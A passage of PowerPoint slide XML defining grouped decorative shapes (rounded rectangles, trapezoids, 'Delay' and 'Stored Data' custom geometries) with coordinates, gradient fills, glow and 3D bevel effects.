                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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ounded Rectangle 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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ounded Rectangle 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="Group 56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6563868" y="3186941"/>
            <a:ext cx="1122431" cy="1879830"/>
            <a:chOff x="2266051" y="1450709"/>
            <a:chExt cx="2198318" cy="3681709"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Rectangle 57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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Trapezoid 58"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2582053" y="1450709"/>
              <a:ext cx="1566316" cy="1686284"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 23881"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="74000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="41000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="39000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="92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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="139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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2671935" y="1503488"/>
              <a:ext cx="1386550" cy="1506594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alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:alpha val="74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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
